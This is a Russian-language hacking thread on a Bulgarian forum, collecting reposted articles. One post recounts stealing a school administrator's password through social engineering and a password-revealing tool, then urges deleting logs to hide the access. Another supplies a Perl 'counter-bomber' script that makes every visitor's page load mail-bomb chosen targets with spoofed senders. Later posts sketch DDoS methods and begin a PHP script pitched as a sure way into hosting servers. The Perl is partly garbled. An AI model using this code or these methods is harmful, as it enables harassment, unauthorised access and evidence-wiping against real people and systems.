нужно - а потому что если ты учишься в американской школе - фиг тебе кто скажет оценки в середине симеситра!!! Ты тока гадать можешь! И у них не так как у на с пятерки тройки ... У них разные тесты с разным количеством очков и т.д. и хрен ты подсчитаешь что у тебя выходит! А с ентим маленьким хаком мона посмотреть! Ну а теперь я расскажу очень хороший пример социальной инженерии - добываем пароль админа ! +)

Выяснил что один из админов - это чувак с 12 класса! Завел дружбу - ведь вместе компами интересуемся - еще был какой-то комп клуб - он его вел я стал тоже почсещать этот клуб. Все мы работали на компах - пописать иногда человеку надо - а зачем для этого выходить с систмы? не надо - ну я так пытался себе админа поставить када он ссать ходил - не вшло Людей вокруг много. Но я нашел выход - говорю мне б фтп клиента какого взять и на школьные тачки поставить - он говорит так вотн на той тачке стогит! Я говорю спасибо!

А зачем я это делал? Что бы заходить на фтп из локалки нужен админовские привилегии, и во всех фтп-клиентах он спрашивает файрвол. Без него не попядешь на фтп из школьной сети. Ну ессесно он ввел свой пароль и логин туда и сохранил его ессесно - для удобства пользователей - может учителю понадобится чего-нить скачать с фтп (ученикам даунлоудить не разрешено)! А я скачал openpass и открыл пароль который раньше был звездочками. Ну вот у меня теперь доступ админовский есть! Вот! Все теперь с системой могу делать - тока надо быть очень осторожен - удаляй хистори и логи и куки, вообщем все что говорит что кто-то посторонний был в системе с админ правами!

Breaking the Waves




Тема Луки Хлебаров, как е?нови [re: Lucky_Man]  
Автор Zzloba... (победоносец)
Публикувано31.10.04 00:10



Пак ли те изгониха от работа?

Ма старите навици остават.

Zzloba

Тю, пак язък!
Иван Костов след изборите 2005 г.


Тема :: Накажи своего враганови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано03.11.04 20:16



Скажи, тебя когда-нибудь обижали? Ну к примеру, какой-нибудь придурок писал разные гадости тебе на мыло? Не писал, да? Тогда тебе просто повезло и ты можешь дальше не читать, ибо эта статья - не для тебя. Итак, есть тот, кому ты очень хочешь отомстить. Наверное тебе приходит в голову мысль просто засыпать его e-mail гнусным спамом… Но вот беда ты слишком ленив, чтобы ежедневно слать ему сотни мегабайт мусора… Да и из модема много не выжмешь…

Что ж подойдем к проблеме с другой стороны - у тебя есть пага? Ну конечно же есть - ведь ты продвинутый перец… И ты, наверное, поставил на ней счетчик, чтобы знать сколько людей приходит на нее посмотреть. Скажи, я что умеет твой счетчик? Что, только количество посещений считать!?!? И что больше ничего? А что будет если его заменить на "Счетчик-Бомбер"? ...
Тогда каждый, кто заходит на твою пагу, будет отправлять спам твоим врагам, абсолютно не зная об этом… Предположим:

А) у тебя на паге будет счетчик всего из пяти цифр;
Б) посещаемость твоей паги - 100 человек в день;
B) у тебя трое врагов;

Итого: В результате того, что пагу посетит 100 человек, твой "счетчик", будет запущен 500 раз и отправит 1500 писем твоим врагам. А теперь представь, что каждое письмо мы сделаем в мегабайт величиной… получается 1,5 ГИГАБАЙТА спама В ДЕНЬ, или по 500 мегабайт на каждого недруга…А ты даже и пальцем не пошевелил…Классно, да? Тогда, меняй скорее свой счетчик на мой "счетчик-бомбер" и читай дальше как им пользоваться…

#!/usr/bin/perl

$mailprog = '/usr/sbin/sendmail';
$digits_basedir = "http://www.твоя_пага.ru/digits/";
$count_file = "count.txt";
$classica = "classics.txt";
$targets = "targets.txt";
$emails = "emails.txt";
$results = "results.txt";

($place, $Write) = split(/&/,$ENV);
open (COUNT,"$count_file") || die "Can't Open Count File $count_file, Error : $! ";
($count) = ;
chomp($count);
close(COUNT);
$count++;
open (COUNT,">$count_file") || die "Can't Open Count File $count_file, Error : $! ";
print COUNT "$count";
close(COUNT);
$count = "0000000000".$count;
@chiffres = split(//, $count);
@chiffres = reverse(@chiffres);
print "Location: ".$digits_basedir.$chiffres[$place].".gif ";
open (COUNT,">$count_file") || die "Can't Write Count File $count_file, Error : $! ";
($count2) = ;
chomp($count);
close(COUNT);
open (CLASSICS, "$classica") || die "Can't open CLASSICS File $classica, Error : $! ";
(@classics) = ;
$total = @classics;
while (($count2) > ($total)){
$count2 = $count2 - $total;
}
$subject = $classics[$count2];
chomp ($subject);
close CLASSICS;
open (EMAILS, "$emails") || die "Can't open EMAILS File $emails, Error : $! ";
(@emails) = ;
$total2 = @emails;
while (($count2) > ($total2)){
$count2 = $count2 - $total2;
}
$from = $emails[$count2];
chomp ($from);
close EMAILS;
open (RESULTS, "$results") || die "Can't Open RESULTS File $results, Error : $! ";
($count3) = ;
chomp($count3);
close(RESULTS);
open (TARGETS, "$targets") || die "Can't Open TARGETS File $targets, Error : $! ";
while (){
($target) = ;
chomp ($target);
open (MAIL, "|$mailprog -t");
print MAIL "Content-Type: text/plain ";
print MAIL "Subject: $subject ";
print MAIL "To: $target ";
print MAIL "From: $from ";
print MAIL "На козел, покушай классики!!! ";
print MAIL "@classics ";
close MAIL;
$count3++;
}
open (RESULTS,">$results") || die "Can't Write RESULTS File $results, Error : $! ";
print RESULTS "$count3";
close RESULTS;

Coded by: Georgy, платный консультант

Уже заменил? Ну что ж теперь не грех рассказать как он действует… В папке со скриптом у тебя должно быть пять файлов:

Count.txt - тот файл, куда будут записываться показания счетчика (кол-во посещений);
Classics.txt - тот файл, откуда будет браться текст для писем (у меня это глава из "Капитанской дочки" А.С. Пушкина), из этого файла также случайным образом будет генерироваться заголовок сообщения;
Targets.txt - Список "вражеских" e-mail`ов(каждый адрес с новой строки);
Emails.txt - из этого файла будет случайным образом выбираться адрес отправителя письма, поэтому это должен быть список e-mail`ов, где каждый адрес написан с новой строки;
Results.txt - Служебный файл, куда будет записываться количество отправленных писем (чтобы душа смотрела и радовалась);

Итак, посетитель заходит на страницу, в результате чего счетчик запускается столько раз, сколько цифр ты указал для отображения. При каждом запуске, он отправляет по одному письму каждому из врагов, адреса которых находятся в targets.txt (письма не простые, а со случайным адресом отправителя и случайной темой). Текст письма берется из classics.txt - поэтому советую напихать туда побольше текста…

Ну а теперь как пользоваться счетчиком - именно как счетчиком… Тебе понадобятся цифры для самого счетчика - их можно взять на моем сайте. Для того, чтобы пользоваться счетчиком по прямому назначению, нужно вставить в свою пагу следующий код:





В результате будет выдан счетчик из трех цифр, как поставить больше цифр - догадайся сам ;-)) Этот счетчик будет показать количество посещений твоей паги…

Теперь нам нужен счетчик служебный который будет показывать количество отправленных писем:

#!/usr/bin/perl

$file = "results.txt";
$digits_basedir = "http://www.твоя_пага.ru/digits/";

($place, $Write) = split(/&/,$ENV);

open (COUNT, "$file") || die "Can't Open Count File $file, Error : $! ";
($count) = ;
chomp($count);
close(COUNT);

$count = "0000000000".$count;
@chiffres = split(//, $count);
@chiffres = reverse(@chiffres);
print "Location: ".$digits_basedir.$chiffres[$place].".gif ";

Вызвать служебный счетчик можно аналогично первому, за исключением параметра "&W".


Ну и напоследок… Если ты настолько ленив, что даже не завел себе страничку, или она у тебя с хостингом типа "Бесплатно.ру" (где тебя, кстати, быстренько прикроют за спам), то смело топай ко мне на http://georgy.h1.ru/. Там ты найдешь рабочую версию "Счетчика-бомбера" и также сможешь подписать своих "недругов" на "рассылочку" произведения Великого А.С. Пушкина "Капитанская дочка" - пусть враги почитают, окультурятся, поумнеют ;-))))

Breaking the Waves




Тема :: Хакеры: Who is Whoнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано07.11.04 11:33



:: Хакеры: Who is Who

В 2002 году было зафиксировано более 80 тыс. случаев кибератак (атаки хакеров, попытки краж информации и т.д.). Их число резко увеличилось по сравнению с 2001 годом, когда было зафиксировано примерно 58 тыс. таких нарушений (чуть более 20 тыс. в 2000 году).

Чаще всего мишенями злоумышленников становятся сети США. В 2002 году было отмечено почти 27 тыс. компьютерных атак. Ожидается, что к 2005 году доходы от пиратского копирования музыки, софта, видео и текстов из Интернета составят 112 млрд. долларов.

К сожалению, официальная статистика пока еще не дает возможности получить достоверных данных относительно характеристики лиц, которые...
совершают такие атаки на компьютерные системы.
Исследования, проведенные в Центре исследования проблем компьютерной преступности, показали, что основными целями и мотивами преступлений в сфере компьютерной информации выступают корысть (56,8% анкетируемых), хулиганские побуждения (17,1%), месть (12,7%), коммерческий шпионаж или диверсия (9,1%). Преступления в сфере использования компьютерных технологий в 5 раз чаще совершаются мужчинами. Большинство субъектов преступления имеют высшее или неоконченное высшее техническое образование (53,7%), а также иное высшее или неоконченное высшее образование (19,2%). среди них преобладают лица в возрасте от 30 до 45 лет (46,5%), а также от 16 до 30 лет (37,8%).

Несмотря на то, что хакерами называют всех, кто сможет спровоцировать кибератаку, но это не совсем так хакеры бывают разные (белые, синие. красные), они обладают разными возможностями и ущерб от их деятельности также различный. В результате проведенных исследований выделены следующие наиболее опасные субъекты неправомерного доступа к компьютерной информации:


фрикеры – люди, специализирующиеся на использовании телефонных систем с целью уклонения от оплаты телекоммуникационных услуг;

кардеры – оплачивают свои расходы с чужих кредитных карточек;

коллекционеры - коллекционируют и используют компьютерные программные продукты, перехватывают различные пароли, а также коды телефонного вызова и номера телефонных компаний, имеющих выход к компьютерным сетям общего использования, например, Интернет;

кибервороны – злоумышленники, которые специализируются на несанкционированном проникновении в компьютерные системы финансовых, банковских расчетов. Используют компьютерные технологии для получения номеров кредитных карточек и другой ценной информации с целью наживы. Нередко полученную информацию они продают другим лицам;

компьютерные пираты – специализируются на незаконном взломе систем защиты лицензионных компьютерных программных продуктов, которые потом распространяются за деньги. Торгуют ими по ценам, которые значительно ниже цен законных изготовителей.

Сегодня с большой уверенностью можно утверждать, что процесс интенсивного внедрения во все сферы деятельности IT, приводит к возникновению новых виртуальных транснациональных криминальных групп, которые в своих преступных целях используют широкие возможности Интернета.

Breaking the Waves




Тема :: Анатомия DDoSнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано10.11.04 23:53



:: Анатомия DDoS

Одним из самых разрушительных хакерских инструментов в последние годы стали так называемые распределенные атаки "отказ в обслуживании" - DDoS (Distributed Denial of Service).

В последнее время их чаще называют просто DoS-атаками, или распределенными атаками. Особая опасность этих атак - в крайней простоте их организации. При этом злоумышленники обычно не ставят перед собой цель проникновения в защищенную компьютерную систему; их задача - парализовать работу атакуемого web-узла.
Оружие массового

поражения Между тем, это одна из самых молодых хакерских технологий - ее осуществление стало возможно только в связи с действительно повсеместным распространением Интернета и проникновением его в самые разные сферы общественной жизни. Не случайно о DoS-атаках широко заговорили только после того, как в декабре 1999 года при помощи этой технологии были "завалены" web-узлы таких известных корпораций, как Amazon, Yahoo, CNN, eBay, E-Trade и ряда других, немногим менее известных. Хотя первые сообщения о чем-то похожем появились еще в 1996 году, до "рождественского сюрприза" 1999 года DoS-атаки не воспринимались специалистами по компьютерной безопасности как серьезная угроза, исходящая из Сети. Однако спустя год, в декабре 2000-го, все повторилось: web-узлы крупнейших корпораций были атакованы по технологии DDoS, а их системные администраторы вновь не смогли ничего противопоставить злоумышленникам.

Ну а в 2001 году DoS-атаки стали уже обычным делом. Теперь системные администраторы крупных корпораций и государственных web-узлов со страхом ожидают Рождества-2001. По имеющейся информации, хакеры потратили год на существенную модернизацию своего инструментария, а ведь существующие схемы защиты от DoS-атак и без того недостаточно совершенны.

Собственно говоря, DoS-атаки производятся отнюдь не для кражи информации или какого-либо манипулирования ею. Основная их цель - парализовать работу узла-жертвы.

Собственно говоря, это просто сетевой терроризм. Не случайно поэтому американские спецслужбы подозревают, что за многими DoS-атаками на серверы крупных корпораций стоят пресловутые антиглобалисты. Действительно: одно дело швырнуть кирпич в витрину "Макдональдса" где-нибудь в Мадриде или Праге, и совсем уже другое - "завалить" сайт этой суперкорпорации, давно уже ставшей своеобразным символом глобализации мировой экономики.
DoS-атаки опасны еще и тем, что для их развертывания кибертеррористам не требуется обладать какими-то особенными знаниями и умениями.

Сегодняшний уровень развития соответствующего хакерского инструментария таков, что раздобыть и использовать по назначению программы, необходимые для организации и начала DoS-атаки, - дело нескольких часов для человека, более-менее ясно представляющего себе, что такое Интернет и как он функционирует. Все необходимое программное обеспечение вместе с описаниями самой технологии совершенно свободно доступно в Сети. Зато последствия могут быть весьма плачевными - жертва такой атаки может на несколько часов, а порой и дней, лишить своих клиентов привычного сервиса. Наверное, не нужно объяснять, чем это чревато для тех же интернет-СМИ или узлов электронной коммерции. Причем защититься от такой атаки весьма сложно.

Анатомия атаки

В общем случае технология DoS-атаки выглядит следующим образом: на выбранный в качестве мишени web-узел обрушивается шквал ложных запросов со множества компьютеров по всему миру.

В результате обслуживающие узел серверы оказываются парализованы и не могут обслуживать запросы обычных пользователей. При этом пользователи компьютеров, с которых направляются ложные запросы, и не подозревают о том, что их машина тайком используется злоумышленниками. При проведении атаки DDoS множество компьютерных систем одновременно начинает генерировать DoS-атаки, направленные на общую цель. Такое распределение нагрузки по сотням, а то и тысячам систем оказывается одним из самых лучших способов решения задач, требующих интенсивного использования системных ресурсов - а атаки DDoS относятся именно к таким задачам. При этом распределение рабочей нагрузки среди множества систем не только позволяет увеличить разрушительное действие атаки, но и существенно усложняет действия по защите от нее, а также не позволяет выявить истинный адрес атакующего узла.

Первоочередная задача злоумышленников состоит в том, чтобы получить доступ к достаточному числу узлов сети, чтобы разместить на них агентов атаки DDoS (так называемых "зомби"). Поскольку это сугубо подготовительный этап, хакеру неважно, какие узлы будут использоваться для атаки, и он просто перебирает все подряд в поисках наименее защищенных. Найти таковые обычно не составляет большого труда - благо, безалаберных сисадминов на планете достаточно. При этом современные инструментальные средства, созданные и используемые хакерами, по большей части, автоматизируют данную работу, а также организацию и инициализацию атак. Узлы, на которых размещены агенты DoS-атаки, называются "скомпрометированными". Обычно при проведении масштабных DDoS-атак злоумышленниками создается трехуровневая архитектура - так называемый "кластер DDoS". Это иерархическая структура, на самой вершине которой находится одна или несколько управляющих консолей. Управляющая консоль - это, собственно, и есть тот самый компьютер, с которого хакер запускает атаку на систему. Управляющая консоль формирует команды, поступающие на следующий иерархический уровень - уровень главных контроллеров. Их на одну консоль может приходиться от десятка до нескольких сотен - в зависимости от масштабов атаки. Это также скомпрометированные web-узлы, но они не участвуют непосредственно в самой атаке. Каждый контроллер, в свою очередь, координирует действия большого количества (порядка нескольких тысяч) агентов-"зомби" - это уже третий уровень кластера. И уже "зомбированные" узлы берут на себя функции по непосредственному проведению атаки на узел-мишень. Проследить эту систему в обратном направлении практически невозможно. Анализ трафика "жертвы" приведет к узлу-агенту, и даже узел-контроллер становится отыскать непросто, не говоря уже об атакующей консоли. Какими они бывают
Сегодня наиболее часто используются следующие пять разновидностей DoS-атак, для проведения которых существует большое количество программного обеспечения и от которых наиболее тяжело защититься: Smurf - ping-запросы ICMP (Internet Control Message Protocol) по адресу направленной широковещательной рассылки. Используемый в пакетах этого запроса фальшивый адрес источника в результате оказывается мишенью атаки. Системы, получившие направленный широковещательный ping-запрос, отвечают на него и "затапливают" сеть, в которой находится сервер-мишень.

ICMP flood - атака, аналогичная Smurf, только без усиления, создаваемого запросами по направленному широковещательному адресу. UDP flood - отправка на адрес системы-мишени множества пакетов UDP (User Datagram Protocol), что приводит к "связыванию" сетевых ресурсов.

TCP flood - отправка на адрес системы-мишени множества TCP-пакетов, что также приводит к "связыванию" сетевых ресурсов. TCP SYN flood - при проведении такого рода атаки выдается большое количество запросов на инициализацию TCP-соединений с узлом-мишенью, которому, в результате, приходится расходовать все свои ресурсы на то, чтобы отслеживать эти частично открытые соединения.

Специалисты по информационной безопасности выделяют семь основных групп (т.н. "семейств") инструментальных средств для организации DoS-атак. Однако на практике наиболее часто используются средства трех семейств - trinoo, Tribe Flood Network (TFN и TFN2K) и Stacheldracht. Исторически первым средством для организации DoS-атак стало trinoo. Это достаточно примитивная, по современным меркам, разработка, и она способна запускать атаку только вида UDP flood. Причем, для взаимодействия главного контроллера и агентов используются нешифрованные протоколы TCP и UDP. Благодаря своей простоте, программы "семейства" trinoo легко обнаруживаются и обезвреживаются современными средствами защиты и не представляют угрозы узлам, владельцы которых заботятся об элементарных мерах безопасности.

Намного более серьезное оружие хакеров - средства организации распределенных атак TFN и TFN2K. Они позволяют одновременно инициировать атаки нескольких типов - Smurf, UDP flood, ICMP flood и TCP SYN flood. Пересылка команд и параметров при этом умело спрятана в передаваемых данных - чтобы не вызвать подозрений у защитного ПО. TFN и TFN2K требуют от хакера намного более высокой квалификации, но и практическая эффективность их намного выше (включая и защиту самого хакера от обнаружения). Представитель новейшего поколения средств организации DoS-атак - Stacheldracht ("колючая проволока"). Этот пакет позволяет организовывать самые различные типы атак и лавины широковещательных ping-запросов. Кроме того, обмен данными между контроллерами и агентами шифруется, а в само ПО встроена функция автомодификации. Защита и предупреждение В случае DoS-атаки трафик, предназначенный для переполнения атакуемой Сети, необходимо "отсекать" у провайдера услуг Интернет, потому что на входе в Сеть сделать это уже будет невозможно - вся полоса пропускания будет занята.

Угрозу DoS-атак можно снизить несколькими способами. Во-первых, необходимо правильно сконфигурировать функции анти-спуфинга на маршрутизаторах и межсетевых экранах. Эти функции должны включать, как минимум, фильтрацию RFC 2827. Если хакер будет не в состоянии замаскировать свою истинную личность, он вряд ли решится на проведение атаки. Во-вторых, необходимо включить и правильно сконфигурировать функции анти-DoS на маршрутизаторах и межсетевых экранах. Эти функции ограничивают число полуоткрытых каналов, не позволяя перегружать систему. Также рекомендуется при угрозе DoS-атаки ограничить объем проходящего по сети некритического трафика. Об этом уже нужно договариваться со своим интернет-провайдером. Обычно в подобных случаях ограничивается объем трафика ICMP, так как он используется сугубо для диагностических целей.

Как уже говорилось, вычислить кибертеррористов, организовавших DoS-атаку, крайне сложно. Это все равно, что искать отправителя письма, в котором неправильно указан обратный адрес. Для защиты от DoS-атак администраторы узлов-мишеней должны тесно сотрудничать со своими интернет-провайдерами, а те, в свою очередь, - с операторами магистральных сетей, таких как Uunet или Sprint. Но и самый надежно защищенный web-узел неспособен выдержать многогигабайтовый трафик. В плане же менеджмента волна DoS-атак служит хорошим стимулом для разработки корпоративных планов быстрого реагирования. Такие планы особенно важны для компаний, занимающихся электронной коммерцией, так как в данном случае доступность их web-узлов - критический фактор.

Breaking the Waves




Тема :: Взлом через PHP-скриптнови [re: Pимлянин]  
Автор Lucky_Man ()
Публикувано27.11.04 14:40



:: Взлом через PHP-скрипт

Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт.

Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом.

Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании, которую хакер собирается взломать.
В большей части взлому подвержены бесплатные хостинговые компании и провайдеры, которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов.

Идея реализации атаки заключается в том, чтобы залезть на жесткий диск провайдера и иметь возможность управлять файлами, тоесть удалять, просматривать, редактировать. Для этого нам придётся написать небольшой скрипт, который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт: заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства, переходить из каталога в каталог, указывать полные пути до файлов:

//говорим что это PHP скрипт
function cmp( $a, $b ) //обьявляем функции
{
GLOBAL $sort; //сортируем полученные функции

if( $a->inode == $b->inode )
return 0;

switch( $sort ) //объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}

function getIcons( $ext ) //объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "image2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case

Breaking the Waves





Страници по тази тема: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | (покажи всички)
*Кратък преглед
Клуб :  


Clubs.dir.bg е форум за дискусии. Dir.bg не носи отговорност за съдържанието и достоверността на публикуваните в дискусиите материали.

Никаква част от съдържанието на тази страница не може да бъде репродуцирана, записвана или предавана под каквато и да е форма или по какъвто и да е повод без писменото съгласие на Dir.bg
За Забележки, коментари и предложения ползвайте формата за Обратна връзка | Мобилна версия | Потребителско споразумение
© 2006-2024 Dir.bg Всички права запазени.